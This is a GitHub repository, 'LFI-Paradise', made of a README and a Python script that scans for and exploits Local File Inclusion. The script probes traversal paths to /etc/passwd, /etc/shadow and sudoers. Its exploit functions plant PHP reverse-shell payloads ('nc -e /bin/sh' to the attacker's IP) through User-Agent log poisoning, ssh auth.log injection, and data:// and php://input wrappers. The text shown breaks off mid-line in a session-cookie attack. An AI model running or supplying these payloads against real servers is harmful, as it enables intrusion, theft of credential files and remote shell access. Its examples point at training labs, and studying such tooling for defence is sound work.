├── README.md
└── lfi.paradise.py


/README.md:
--------------------------------------------------------------------------------
 1 | # LFI-Paradise
 2 | Local File Inclusion Scanner and Exploiter
 3 | 
 4 | **Features**
 5 | 1- Scanner
 6 | 
 7 | 2- Exploiter
 8 | 
 9 | **Exploiter Attack Vectors:**
10 | 
11 | 1- /proc/self/environ
12 | 
13 | 2- /var/log/auth.log
14 | 
15 | 3- Apache Log Poisoning
16 | 
17 | 4- php://input
18 | 
19 | 5- Php Sessions and Cookies
20 | 
21 | 6- Data Wrapper
22 | 
23 | 7- SMTP Poisoning
24 | 
25 | 8- All attacks in one
26 | 
27 | 
28 | **Installation**
29 | - git clone https://github.com/S12cybersecurity/LFI-Paradise/
30 | - cd LFI-Paradise
31 | - pip3 install pyfiglet
32 | - pip3 install SimpleTelnetMail
33 | 
34 | **Usage**
35 | - python3 lfi.paradise.py
36 | 
37 | 
38 | ![imatge](https://user-images.githubusercontent.com/79543461/147583246-4ecc4c39-de28-4603-97eb-cde8d927c3e9.png)
39 | 


--------------------------------------------------------------------------------
/lfi.paradise.py:
--------------------------------------------------------------------------------
  1 | from os import error, strerror
  2 | import requests
  3 | import pyfiglet
  4 | import sys
  5 | import socket
  6 | import os
  7 | import base64
  8 | from SimpleTelnetMail import *
  9 | 
 10 | 
 11 | banner = pyfiglet.figlet_format("LFI . PARADISE")
 12 | print(banner)
 13 | 
 14 | linea = "----------------------------------------------------"
 15 | adverstiment = 'AAA'
 16 | 
 17 | def scanner():
 18 | 
 19 |     def url_scan(): 
 20 |         global url
 21 |         global respuesta
 22 |         global respuesta_bien
 23 |         url = input("Put Scan: (Example: http://192.168.0.125/mutillidae/?page=) ")
 24 |         respuesta = requests.get(url)
 25 |         respuesta_bien = respuesta.status_code
 26 |         print(respuesta_bien)
 27 |         if respuesta_bien == 200:
 28 |             print("Correct URL")
 29 |             print(linea)
 30 |             print("Starting Scan to...",url)
 31 |             print(linea)
 32 |             print("Results:")
 33 |         elif error:
 34 |             print("Invalid URL")
 35 |         else:
 36 |             print("Incorrect URL")
 37 | 
 38 |     url_scan()
 39 | 
 40 | 
 41 |     def etc_passwd():
 42 |         global final_url
 43 |         add = "/etc/passwd"
 44 |         final_url = url + add
 45 |         respuesta = requests.get(final_url)
 46 |         if respuesta_bien == 200:
 47 |             if "root" and "bin" in respuesta.text:
 48 |                 print("LFI Vulnerabilitie in:",final_url)
 49 |             elif "404" in respuesta.text:
 50 |                 print("It is not vulnerable")
 51 |             else:
 52 |                 print("It is not vulnerable")
 53 |         add = "/../../etc/passwd"
 54 |         final_url = url + add
 55 |         respuesta = requests.get(final_url)
 56 |         if respuesta_bien == 200:
 57 |             if "root" and "bin" in respuesta.text:
 58 |                 print("LFI Vulnerabilitie in:",final_url)
 59 |             elif "404" in respuesta.text:
 60 |                 print("It is not vulnerable")
 61 |             else:
 62 |                 print("It is not vulnerable")
 63 |         add = "/../../../../etc/passwd"
 64 |         final_url = url + add
 65 |         respuesta = requests.get(final_url)
 66 |         if respuesta_bien == 200:
 67 |             if "root" and "bin" in respuesta.text:
 68 |                 print("LFI Vulnerabilitie in:",final_url)
 69 |             elif "404" in respuesta.text:
 70 |                 print("It is not vulnerable")
 71 |             else:
 72 |                 print("It is not vulnerable")
 73 | 
 74 | 
 75 |     etc_passwd()
 76 | 
 77 |     def etc_shadow():
 78 |         add1 = "/etc/shadow"
 79 |         final_url1 = url + add1
 80 |         respuesta1 = requests.post(final_url1)
 81 |         if respuesta_bien == 200:
 82 |             if "root" and "daemon" and "bin" in respuesta1.text:
 83 |                 print("LFI Vulnerabilitie in:",final_url1)
 84 |             elif "404" in respuesta1.text:
 85 |                 print("It is not vulnerable")
 86 |             else:
 87 |                 print("It is not vulnerable")
 88 |         add1 = "/../../etc/shadow"
 89 |         final_url1 = url + add1
 90 |         respuesta1 = requests.post(final_url1)
 91 |         if respuesta_bien == 200:
 92 |             if "root" and "daemon" and "bin" in respuesta1.text:
 93 |                 print("LFI Vulnerabilitie in:",final_url1)
 94 |             elif "404" in respuesta1.text:
 95 |                 print("It is not vulnerable")
 96 |             else:
 97 |                 print("It is not vulnerable")
 98 |         add1 = "/../../../../etc/shadow"
 99 |         final_url1 = url + add1
100 |         respuesta1 = requests.post(final_url1)
101 |         if respuesta_bien == 200:
102 |             if "root" and "daemon" and "bin" in respuesta1.text:
103 |                 print("LFI Vulnerabilitie in:",final_url1)
104 |             elif "404" in respuesta1.text:
105 |                 print("It is not vulnerable")
106 |             else:
107 |                 print("It is not vulnerable")
108 | 
109 |     etc_shadow()
110 | 
111 |     def crontabs():
112 |         add2 = "/var/spool/cron/crontabs/root"
113 |         final_url2 = url + add2
114 |         respuesta2 = requests.post(final_url2)
115 |         if respuesta_bien == 200:
116 |             if "For more information see the manual pages of crontab(5) and cron(8)" in respuesta2.text:
117 |                 print("LFI Vulnerabilitie in:",final_url2)
118 |             elif "404" in respuesta2.text:
119 |                 print("It is not vulnerable")
120 |             else:
121 |                 print("It is not vulnerable")
122 |         add2 = "/../../var/spool/cron/crontabs/root"
123 |         final_url2 = url + add2
124 |         respuesta2 = requests.post(final_url2)
125 |         if respuesta_bien == 200:
126 |             if "For more information see the manual pages of crontab(5) and cron(8)" in respuesta2.text:
127 |                 print("LFI Vulnerabilitie in:",final_url2)
128 |             elif "404" in respuesta2.text:
129 |                 print("It is not vulnerable")
130 |             else:
131 |                 print("It is not vulnerable")
132 |         add2 = "/../../../../var/spool/cron/crontabs/root"
133 |         final_url2 = url + add2
134 |         respuesta2 = requests.post(final_url2)
135 |         if respuesta_bien == 200:
136 |             if "For more information see the manual pages of crontab(5) and cron(8)" in respuesta2.text:
137 |                 print("LFI Vulnerabilitie in:",final_url2)
138 |             elif "404" in respuesta2.text:
139 |                 print("It is not vulnerable")
140 |             else:
141 |                 print("It is not vulnerable")
142 | 
143 |     crontabs()
144 | 
145 |     def etc_group():
146 |         add3 = "/etc/group"
147 |         final_url3 = url + add3
148 |         respuesta3 = requests.post(final_url3)
149 |         if respuesta_bien == 200:
150 |             if "root" and "daemon" and "bin" in respuesta3.text:
151 |                 print("LFI Vulnerabilitie in:",final_url3)
152 |             elif "404" in respuesta3.text:
153 |                 print("It is not vulnerable")
154 |             else:
155 |                 print("It is not vulnerable")
156 |         add3 = "/../../etc/group"
157 |         final_url3 = url + add3
158 |         respuesta3 = requests.post(final_url3)
159 |         if respuesta_bien == 200:
160 |             if "root" and "daemon" and "bin" in respuesta3.text:
161 |                 print("LFI Vulnerabilitie in:",final_url3)
162 |             elif "404" in respuesta3.text:
163 |                 print("It is not vulnerable")
164 |             else:
165 |                 print("It is not vulnerable")
166 |         add3 = "/../../../../etc/group"
167 |         final_url3 = url + add3
168 |         respuesta3 = requests.post(final_url3)
169 |         if respuesta_bien == 200:
170 |             if "root" and "daemon" and "bin" in respuesta3.text:
171 |                 print("LFI Vulnerabilitie in:",final_url3)
172 |             elif "404" in respuesta3.text:
173 |                 print("It is not vulnerable")
174 |             else:
175 |                 print("It is not vulnerable")
176 | 
177 | 
178 | 
179 |     etc_group()
180 | 
181 | 
182 |     def netplan():
183 |         add4 = "/etc/netplan/01-network-manager-all.yaml"
184 |         final_url4 = url + add4
185 |         respuesta4 = requests.post(final_url4)
186 |         if respuesta_bien == 200:
187 |             if "network" and "version" in respuesta4.text:
188 |                 print("LFI Vulnerabilitie in:",final_url4)
189 |             elif "404" in respuesta4.text:
190 |                 print("It is not vulnerable")
191 |             else:
192 |                 print("It is not vulnerable")
193 |         add4 = "/../../etc/netplan/01-network-manager-all.yaml"
194 |         final_url4 = url + add4
195 |         respuesta4 = requests.post(final_url4)
196 |         if respuesta_bien == 200:
197 |             if "network" and "version" in respuesta4.text:
198 |                 print("LFI Vulnerabilitie in:",final_url4)
199 |             elif "404" in respuesta4.text:
200 |                 print("It is not vulnerable")
201 |             else:
202 |                 print("It is not vulnerable")
203 |         add4 = "/../../../../etc/netplan/01-network-manager-all.yaml"
204 |         final_url4 = url + add4
205 |         respuesta4 = requests.post(final_url4)
206 |         if respuesta_bien == 200:
207 |             if "network" and "version" in respuesta4.text:
208 |                 print("LFI Vulnerabilitie in:",final_url4)
209 |             elif "404" in respuesta4.text:
210 |                 print("It is not vulnerable")
211 |             else:
212 |                 print("It is not vulnerable")
213 |         
214 |     netplan()
215 | 
216 |     def etc_sudoers():
217 |         add4 = "/etc/sudoers"
218 |         final_url4 = url + add4
219 |         respuesta4 = requests.post(final_url4)
220 |         if respuesta_bien == 200:
221 |             if "root" and "ALL" in respuesta4.text:
222 |                 print("LFI Vulnerabilitie in:",final_url4)
223 |             elif "404" in respuesta4.text:
224 |                 print("It is not vulnerable")
225 |             else:
226 |                 print("It is not vulnerable")
227 |         add4 = "/../../etc/sudoers"
228 |         final_url4 = url + add4
229 |         respuesta4 = requests.post(final_url4)
230 |         if respuesta_bien == 200:
231 |             if "root" and "ALL" in respuesta4.text:
232 |                 print("LFI Vulnerabilitie in:",final_url4)
233 |             elif "404" in respuesta4.text:
234 |                 print("It is not vulnerable")
235 |             else:
236 |                 print("It is not vulnerable")
237 |         add4 = "/../../../../etc/sudoers"
238 |         final_url4 = url + add4
239 |         respuesta4 = requests.post(final_url4)
240 |         if respuesta_bien == 200:
241 |             if "root" and "ALL" in respuesta4.text:
242 |                 print("LFI Vulnerabilitie in:",final_url4)
243 |             elif "404" in respuesta4.text:
244 |                 print("It is not vulnerable")
245 |             else:
246 |                 print("It is not vulnerable")
247 | 
248 |     etc_sudoers()
249 | 
250 |     def etc_grub():
251 |         add4 = "/etc/grub.d/20memtest86+"
252 |         final_url4 = url + add4
253 |         respuesta4 = requests.post(final_url4)
254 |         if respuesta_bien == 200:
255 |             if "bin" and "bash" in respuesta4.text:
256 |                 print("LFI Vulnerabilitie in:",final_url4)
257 |             elif "404" in respuesta4.text:
258 |                 print("It is not vulnerable")
259 |             else:
260 |                 print("It is not vulnerable")
261 |         add4 = "/../../etc/grub.d/20memtest86+"
262 |         final_url4 = url + add4
263 |         respuesta4 = requests.post(final_url4)
264 |         if respuesta_bien == 200:
265 |             if "bin" and "bash" in respuesta4.text:
266 |                 print("LFI Vulnerabilitie in:",final_url4)
267 |             elif "404" in respuesta4.text:
268 |                 print("It is not vulnerable")
269 |             else:
270 |                 print("It is not vulnerable")
271 |         add4 = "/../../../../etc/grub.d/20memtest86+"
272 |         final_url4 = url + add4
273 |         respuesta4 = requests.post(final_url4)
274 |         if respuesta_bien == 200:
275 |             if "bin" and "bash" in respuesta4.text:
276 |                 print("LFI Vulnerabilitie in:",final_url4)
277 |             elif "404" in respuesta4.text:
278 |                 print("It is not vulnerable")
279 |             else:
280 |                 print("It is not vulnerable")
281 | 
282 |     etc_grub()
283 | 
284 | 
285 |     def etc_timezone():
286 |         add4 = "/etc/timezone"
287 |         final_url4 = url + add4
288 |         respuesta4 = requests.post(final_url4)
289 |         if respuesta_bien == 200:
290 |             if "US" or "SP" or "Eastern" or "Western" or "FR" or "UK" or "CH" or "CA" in respuesta4.text:
291 |                 print("LFI Vulnerabilitie in:",final_url4)
292 |             elif "404" in respuesta4.text:
293 |                 print("It is not vulnerable")
294 |             else:
295 |                 print("It is not vulnerable")
296 |             
297 |     etc_timezone()
298 | 
299 | 
300 |     def syslog():
301 |         add4 = "/var/log/syslog"
302 |         final_url4 = url + add4
303 |         respuesta4 = requests.post(final_url4)
304 |         if respuesta_bien == 200:
305 |             if "systemd" and "info" and "uid" in respuesta4.text:
306 |                 print("LFI Vulnerabilitie in:",final_url4)
307 |             elif "404" in respuesta4.text:
308 |                 print("It is not vulnerable")
309 |             else:
310 |                 print("It is not vulnerable")
311 |         add4 = "/../../var/log/syslog"
312 |         final_url4 = url + add4
313 |         respuesta4 = requests.post(final_url4)
314 |         if respuesta_bien == 200:
315 |             if "systemd" and "info" and "uid" in respuesta4.text:
316 |                 print("LFI Vulnerabilitie in:",final_url4)
317 |             elif "404" in respuesta4.text:
318 |                 print("It is not vulnerable")
319 |             else:
320 |                 print("It is not vulnerable")
321 |         add4 = "/../../../../var/log/syslog"
322 |         final_url4 = url + add4
323 |         respuesta4 = requests.post(final_url4)
324 |         if respuesta_bien == 200:
325 |             if "systemd" and "info" and "uid" in respuesta4.text:
326 |                 print("LFI Vulnerabilitie in:",final_url4)
327 |             elif "404" in respuesta4.text:
328 |                 print("It is not vulnerable")
329 |             else:
330 |                 print("It is not vulnerable")
331 | 
332 |     syslog()
333 | 
334 |     def environ():
335 |         add4 = "/proc/self/environ"
336 |         final_url4 = url + add4
337 |         respuesta4 = requests.post(final_url4)
338 |         if respuesta_bien == 200:
339 |             if "COLOR" and "LANG" in respuesta4.text:
340 |                 print("LFI Vulnerabilitie in:",final_url4)
341 |             elif "404" in respuesta4.text:
342 |                 print("It is not vulnerable")
343 |             else:
344 |                 print("It is not vulnerable")
345 |         add4 = "/../../proc/self/environ"
346 |         final_url4 = url + add4
347 |         respuesta4 = requests.post(final_url4)
348 |         if respuesta_bien == 200:
349 |             if "COLOR" and "LANG" in respuesta4.text:
350 |                 print("LFI Vulnerabilitie in:",final_url4)
351 |             elif "404" in respuesta4.text:
352 |                 print("It is not vulnerable")
353 |             else:
354 |                 print("It is not vulnerable")
355 |         add4 = "/../../../../proc/self/environ"
356 |         final_url4 = url + add4
357 |         respuesta4 = requests.post(final_url4)
358 |         if respuesta_bien == 200:
359 |             if "COLOR" and "LANG" in respuesta4.text:
360 |                 print("LFI Vulnerabilitie in:",final_url4)
361 |             elif "404" in respuesta4.text:
362 |                 print("It is not vulnerable")
363 |             else:
364 |                 print("It is not vulnerable")
365 | 
366 |     environ()
367 | 
368 |     def cmd():
369 |         add4 = "/proc/self/cmdline"
370 |         final_url4 = url + add4
371 |         respuesta4 = requests.post(final_url4)
372 |         if respuesta_bien == 200:
373 |             if "@" and "^" in respuesta4.text:
374 |                 print("LFI Vulnerabilitie in:",final_url4)
375 |             elif "404" in respuesta4.text:
376 |                 print("It is not vulnerable")
377 |             else:
378 |                 print("It is not vulnerable")
379 |         add4 = "/../../proc/self/cmdline"
380 |         final_url4 = url + add4
381 |         respuesta4 = requests.post(final_url4)
382 |         if respuesta_bien == 200:
383 |             if "@" and "^" in respuesta4.text:
384 |                 print("LFI Vulnerabilitie in:",final_url4)
385 |             elif "404" in respuesta4.text:
386 |                 print("It is not vulnerable")
387 |             else:
388 |                 print("It is not vulnerable")
389 |         add4 = "/../../../../proc/self/cmdline"
390 |         final_url4 = url + add4
391 |         respuesta4 = requests.post(final_url4)
392 |         if respuesta_bien == 200:
393 |             if "@" and "^" in respuesta4.text:
394 |                 print("LFI Vulnerabilitie in:",final_url4)
395 |             elif "404" in respuesta4.text:
396 |                 print("It is not vulnerable")
397 |             else:
398 |                 print("It is not vulnerable")
399 | 
400 |     cmd()
401 | 
402 | 
403 | 
404 |     def status():
405 |         add4 = "/proc/self/status"
406 |         final_url4 = url + add4
407 |         respuesta4 = requests.post(final_url4)
408 |         if respuesta_bien == 200:
409 |             if "Name" and "Groups" and "Pid" in respuesta4.text:
410 |                 print("LFI Vulnerabilitie in:",final_url4)
411 |             elif "404" in respuesta4.text:
412 |                 print("It is not vulnerable")
413 |             else:
414 |                 print("It is not vulnerable")
415 |         add4 = "/../../proc/self/status"
416 |         final_url4 = url + add4
417 |         respuesta4 = requests.post(final_url4)
418 |         if respuesta_bien == 200:
419 |             if "Name" and "Groups" and "Pid" in respuesta4.text:
420 |                 print("LFI Vulnerabilitie in:",final_url4)
421 |             elif "404" in respuesta4.text:
422 |                 print("It is not vulnerable")
423 |             else:
424 |                 print("It is not vulnerable")
425 |         add4 = "/../../../../proc/self/status"
426 |         final_url4 = url + add4
427 |         respuesta4 = requests.post(final_url4)
428 |         if respuesta_bien == 200:
429 |             if "Name" and "Groups" and "Pid" in respuesta4.text:
430 |                 print("LFI Vulnerabilitie in:",final_url4)
431 |             elif "404" in respuesta4.text:
432 |                 print("It is not vulnerable")
433 |             else:
434 |                 print("It is not vulnerable")
435 | 
436 |     status()
437 | 
438 | 
439 | 
440 | def scanner_add():
441 |     add4 = str(input("Put path of file what do you want to see: "))
442 |     prova1 = str(input("Put one of the most common words in this file: "))
443 |     prova2 = str(input("Put other common words in this file: "))
444 |     final_url78 = url + add4
445 |     respuesta4 = requests.post(final_url78)
446 |     respuesta_bien = respuesta4.status_code
447 |     if respuesta_bien == 200:
448 |         if prova1 and prova2 in respuesta4.text:
449 |             print("LFI Vulnerabilitie in:",final_url78)
450 |         elif "404" in respuesta4.text:
451 |             print("It is not vulnerable")
452 |         else:
453 |             print("It is not vulnerable")
454 | 
455 | 
456 | def info():
457 |     print("If this URL it's not vulnerable to LFI don't work all features")
458 |     print(linea)
459 |     question = str.lower(input("You want to see Open Ports?  y/n: "))
460 |     if question == "y":
461 |         open_ports()
462 |     elif question == "n":
463 |         pass
464 |     else:
465 |         print("Invalid option")
466 | 
467 |     question2 = str.lower(input("You want to see hostname of victim machine?  y/n: "))
468 |     if question2 == "y":
469 |         hostname()
470 |     elif question2 == "n":
471 |         pass
472 |     else:
473 |         print("Invalid option")
474 |     
475 |     question3 = str.lower(input("You want to see users and groups of victim machine?  y/n: "))
476 |     if question3 == "y":
477 |         users()
478 |     elif question3 == "n":
479 |         pass
480 |     else:
481 |         print("Invalid option")
482 | 
483 | def hostname():
484 |     global url_info
485 |     url_info = input("Put URL: \n(Example: http://192.168.0.125/mutillidae/?page=)")
486 |     add = "/etc/hostname"
487 |     final_url = url_info + add
488 |     respuesta = requests.get(final_url)
489 |     if respuesta == 200:
490 |         print(final_url)
491 |     else:
492 |         print("Incorrect or No vulnearble page")
493 |         
494 | 
495 | def open_ports():
496 |     def scan(target):
497 |         converted_ip = target
498 |         print('\n' + 'Scanning target...: ' + str(target))
499 |         for port in range(1, 3000):
500 |             scan_port(converted_ip, port)
501 |     def scan_port(ipaddress, port):
502 |         try:
503 |             global serv
504 |             serv = socket.getservbyport(port)
505 |             sock = socket.socket()
506 |             sock.settimeout(0.02)
507 |             sock.connect((ipaddress, port))                
508 |             print('Port ' + str(port) + " Opened", "\t Service:", serv, "working")
509 |         except:
510 |             pass
511 | 
512 |     if __name__ == "__main__":
513 |         targets = input('[+] Enter Target/s To Scan: ')
514 |         if ',' in targets:
515 |             for ip_add in targets.split(','):
516 |                 scan(ip_add.strip(' '))
517 |         else:
518 |             scan(targets)
519 | 
520 | def users():
521 |     add = "/etc/groups"
522 |     final_url = url_info + add
523 |     respuesta = requests.get(final_url)
524 |     if respuesta == 200:
525 |         print(final_url)
526 |     else:
527 |         print("Incorrect or no vulnerable URL")
528 | 
529 | def proc_self_environ():
530 |     print(linea)
531 |     ip_local = input("Put your IP\nIP: ")
532 |     pene = '<?passthru("nc -e /bin/sh '+ ip_local + ' 1212");?>'
533 |     url_exploitation2 = url_exploitation + "/proc/self/environ"
534 |     h = {'User-Agent':pene}
535 |     r = requests.get(url_exploitation2,headers=h)
536 |     a = r.request.headers
537 |     responde = r.status_code
538 |     print(responde)
539 | 
540 | def var_log_auth():
541 |     fcinco = input("Put URL of /var/log/auth.log file\nExample: (http://192.168.0.130/dvwa/vulnerabilities/fi/?page=/var/log/auth.log)")
542 |     os.system('gnome-terminal')
543 |     print(linea)
544 |     print("Put this in new terminal\nnc -vv -l -p 1212")
545 |     print(linea)
546 |     ip_m = str(input("Put your local IP: "))
547 |     ip_s = str(input("Put IP of the Server Victim: "))
548 |     question = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?   y/n: "))
549 |     if question == "y":
550 |         primera_part = 'ssh "<?passthru(base64_decode('
551 |         segona_part = "nc -e /bin/bash "+ ip_m +" 1212"
552 |         encodedd = str(base64.b64encode(segona_part.encode()))
553 |         print(encodedd)
554 |         tercera_part = "'));?>'@'+ ip_m +' &"
555 |         final = 'ssh -o StrictHostKeyChecking=no "<?passthru(base64_decode(' + encodedd + "));?>" + '"@'+ ip_s +" &"
556 |         print(final)
557 |         os.system(final)
558 |         requests.get(fcinco + "/var/log/auth.log")
559 |         f5 = "firefox " + fcinco
560 |         os.system(f5)
561 |         print(linea)
562 |         print("If there has been no positive result, put this URL in your browser: " + fcinco)
563 |         print(linea)
564 |         question2 = str.lower(input("This work correctly?:  y/n"))
565 |         if question2 == "y":
566 |             print("Perfect :)")
567 |         elif question2 == "n":
568 |             os.system(f5)
569 |         elif KeyboardInterrupt:
570 |             pass
571 |         else:
572 |             print("Invalid")
573 |     else:
574 |         print("Invalid")
575 | 
576 | 
577 | def data_wrapper():
578 |     print(linea)
579 |     print("Put the command (nc -vv -l -p 1212) in new terminal!")
580 |     print(linea)
581 |     connnn = str.lower(input("You put the command (nc -vv -l -p 1212) in new terminal?   y/n"))
582 |     if connnn == "y":
583 |         lllurl = str.lower(input('Put URL  Example (http://192.168.0.125/mutillidae/index.php?page=)\n URL: '))
584 |         ip_local__ = input("Put your Local IP: ")
585 |         add_in_link = 'data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=nc -e ' +  ip_local__ + ' 1212'
586 |         cc = requests.get(lllurl + add_in_link)
587 |         print(cc)
588 |     elif connnn == "n":
589 |         print("Put the command")
590 |     else:
591 |         print("Error :(")
592 | 
593 | 
594 | def posioning_apache():
595 |     print(linea)
596 |     print("Working...")
597 |     distro = input("What Linux Distro are the Server Victim?\n1- Ubuntu/Debian Family\n2- CentOS/Red Hat Family\n3- FreeBSD\n4- I don't know, Try to discover\nOption: ")
598 |     if distro == "1":
599 |         urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
600 |         print(linea)
601 |         print("Put new terminal with this command: nc -vv -l -p 1212")
602 |         netcat = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?    y/n"))
603 |         local_ip = input("Put your Local IP: ")
604 |         reverse_shell = "<?passthru('nc -e /bin/sh " + local_ip + " 1212');?>"
605 |         if netcat == "y":
606 |             h = {"User-Agent":reverse_shell}
607 |             pet = requests.get(urll + "/var/log/apache2/access.log",headers=h)
608 |             result = pet.status_code
609 |             headerss = pet.request.headers
610 |             print(headerss)
611 |             print(result)
612 |             requests.get(urll + "/var/log/apache2/access.log")
613 |             bien_ = input("Your nc terminal recived a connection?   y/n: ")
614 |             if bien_ == "y":
615 |                 print("Perfect:)")
616 |             elif bien_ == "n":
617 |                 os.system('firefox' + urll + '/var/log/apache2/access.log')
618 |         elif netcat == "n":
619 |             print("Put the comand and then execute this script")
620 |         else:
621 |             print("Error")
622 |     elif distro == "2":
623 |         urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
624 |         print(linea)
625 |         print("Put new terminal with this command: nc -vv -l -p 1212")
626 |         netcat = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?    y/n"))
627 |         local_ip = input("Put your Local IP: ")
628 |         reverse_shell = "<?passthru('nc -e /bin/sh " + local_ip + " 1212');?>"
629 |         if netcat == "y":
630 |             h = {"User-Agent":reverse_shell}
631 |             pet = requests.get(urll + "/var/log/httpd/access_log",headers=h)
632 |             result = pet.status_code
633 |             headerss = pet.request.headers
634 |             print(headerss)
635 |             print(result)
636 |             requests.get(urll + "/var/log/httpd/access_log")
637 |             bien_ = input("Your nc terminal recived a connection?   y/n: ")
638 |             if bien_ == "y":
639 |                 print("Perfect:)")
640 |             elif bien_ == "n":
641 |                 os.system('firefox' + urll + ' /var/log/httpd/access_log')
642 |         elif netcat == "n":
643 |             print("Put the comand and then execute this script")
644 |         else:
645 |             print("Error")
646 |     elif distro == "3":
647 |         urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
648 |         print(linea)
649 |         print("Put new terminal with this command: nc -vv -l -p 1212")
650 |         netcat = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?    y/n"))
651 |         local_ip = input("Put your Local IP: ")
652 |         reverse_shell = "<?passthru('nc -e /bin/sh " + local_ip + " 1212');?>"
653 |         if netcat == "y":
654 |             h = {"User-Agent":reverse_shell}
655 |             pet = requests.get(urll + "/var/log/httpd-access.log",headers=h)
656 |             result = pet.status_code
657 |             headerss = pet.request.headers
658 |             print(headerss)
659 |             print(result)
660 |             requests.get(urll + "/var/log/httpd-access.log")
661 |             bien_ = input("Your nc terminal recived a connection?   y/n: ")
662 |             if bien_ == "y":
663 |                 print("Perfect:)")
664 |             elif bien_ == "n":
665 |                 os.system('firefox' + urll + '/var/log/httpd-access.log')
666 |         elif netcat == "n":
667 |             print("Put the comand and then execute this script")
668 |         else:
669 |             print("Error")
670 |     elif distro == "4":
671 |         url = input("Put Scan: (Example: http://192.168.0.125/mutillidae/?page=) ")
672 |         respuesta = requests.get(url)
673 |         respuesta_bien = respuesta.status_code
674 |         print(respuesta_bien)
675 |         if respuesta_bien == 200:
676 |             print("Correct URL")
677 |             print(linea)
678 |             print("Starting Scan to...",url)
679 |             print(linea)
680 |             print("Results:")
681 |         elif error:
682 |             print("Invalid URL")
683 |         else:
684 |             print("Incorrect URL")
685 |         def os_release():
686 |             add2 = "/etc/lsb-release"
687 |             final_url2 = url + add2
688 |             respuesta2 = requests.post(final_url2)
689 |             if respuesta_bien == 200:
690 |                 if "Ubuntu" in respuesta2.text:
691 |                     print("Is Ubuntu")
692 |                     urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
693 |                     print(linea)
694 |                     print("Put new terminal with this command: nc -vv -l -p 1212")
695 |                     netcat = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?    y/n"))
696 |                     local_ip = input("Put your Local IP: ")
697 |                     reverse_shell = "<?passthru('nc -e /bin/sh " + local_ip + " 1212');?>"
698 |                     if netcat == "y":
699 |                         h = {"User-Agent":reverse_shell}
700 |                         pet = requests.get(urll + "/var/log/apache2/access.log",headers=h)
701 |                         result = pet.status_code
702 |                         headerss = pet.request.headers
703 |                         print(headerss)
704 |                         print(result)
705 |                         requests.get(urll + "/var/log/apache2/access.log")
706 |                         bien_ = input("Your nc terminal recived a connection?   y/n: ")
707 |                         if bien_ == "y":
708 |                             print("Perfect:)")
709 |                         elif bien_ == "n":
710 |                             os.system('firefox' + urll + '/var/log/apache2/access.log')
711 |                     elif netcat == "n":
712 |                         print("Put the comand and then execute this script")
713 |                     else:
714 |                         print("Error")
715 |                 elif "CentOS" in respuesta2.text:
716 |                     print("Is CentOS")
717 |                     urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
718 |                     print(linea)
719 |                     print("Put new terminal with this command: nc -vv -l -p 1212")
720 |                     netcat = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?    y/n"))
721 |                     local_ip = input("Put your Local IP: ")
722 |                     reverse_shell = "<?passthru('nc -e /bin/sh " + local_ip + " 1212');?>"
723 |                     if netcat == "y":
724 |                         h = {"User-Agent":reverse_shell}
725 |                         pet = requests.get(urll + "/var/log/httpd/access_log",headers=h)
726 |                         result = pet.status_code
727 |                         headerss = pet.request.headers
728 |                         print(headerss)
729 |                         print(result)
730 |                         requests.get(urll + "/var/log/httpd/access_log")
731 |                         bien_ = input("Your nc terminal recived a connection?   y/n: ")
732 |                         if bien_ == "y":
733 |                             print("Perfect:)")
734 |                         elif bien_ == "n":
735 |                             os.system('firefox' + urll + ' /var/log/httpd/access_log')
736 |                     elif netcat == "n":
737 |                         print("Put the comand and then execute this script")
738 |                     else:
739 |                         print("Error")            
740 |                 elif "freebsd" in respuesta2.text:
741 |                     print("Is FreeBSD")
742 |                     urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
743 |                     print(linea)
744 |                     print("Put new terminal with this command: nc -vv -l -p 1212")
745 |                     netcat = str.lower(input("You put (nc -vv -l -p 1212) in new terminal?    y/n"))
746 |                     local_ip = input("Put your Local IP: ")
747 |                     reverse_shell = "<?passthru('nc -e /bin/sh " + local_ip + " 1212');?>"
748 |                     if netcat == "y":
749 |                         h = {"User-Agent":reverse_shell}
750 |                         pet = requests.get(urll + "/var/log/httpd-access.log",headers=h)
751 |                         result = pet.status_code
752 |                         headerss = pet.request.headers
753 |                         print(headerss)
754 |                         print(result)
755 |                         requests.get(urll + "/var/log/httpd-access.log")
756 |                         bien_ = input("Your nc terminal recived a connection?   y/n: ")
757 |                         if bien_ == "y":
758 |                             print("Perfect:)")
759 |                         elif bien_ == "n":
760 |                             os.system('firefox' + urll + '/var/log/httpd-access.log')
761 |                     elif netcat == "n":
762 |                         print("Put the comand and then execute this script")
763 |                     else:
764 |                         print("Error")
765 |         os_release()
766 | 
767 | def input_php():
768 |     os.system('gnome-terminal')
769 |     print(linea)
770 |     print("Put the command (nc -vv -l -p 1212) in new terminal")
771 |     print(linea)
772 |     xdlol = input("You execut the command (nc -vv -l -p 1212) in new terminal?   y/n: ")
773 |     if xdlol == "y":
774 |         enviar = "<?php echo shell_exec($_GET['cmd']);?>"
775 |         ip_m = input("Put your Local IP: ")
776 |         command = 'nc -e /bin/bash '+ ip_m +' 1212'
777 |         urll = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)")
778 |         url = urll + 'php://input&cmd=' + command
779 |         print(url)
780 |         requests.post(url,data=enviar)
781 |     elif xdlol == "n":
782 |         print("Put the command")
783 |     else:
784 |         print("Error")
785 | 
786 | 
787 | def sesion_cookies():
788 |     print(linea)
789 |     print("Put the command (nc -vv -l -p 1212) in new terminal!")
790 |     print(linea)
791 |     ncccc = str.lower(input("You put the command (nc -vv -l -p 1212) in new terminal?   y/n"))
792 |     if ncccc == "y":
793 |         link = input("Put URL (Example: http://192.168.0.125/mutillidae/?page=)\nURL: ")
794 |         link2 = link + '/var/lib/php5/sess_s12cookie'
795 |         local_ip = input("Put your Local IP: ")
796 |         coki = {'Cookie':'PHPSESSID=s12cookie'}
797 |         login = 'username=<?passthru("nc -e /bin/sh ' + local_ip + ' 1212");'
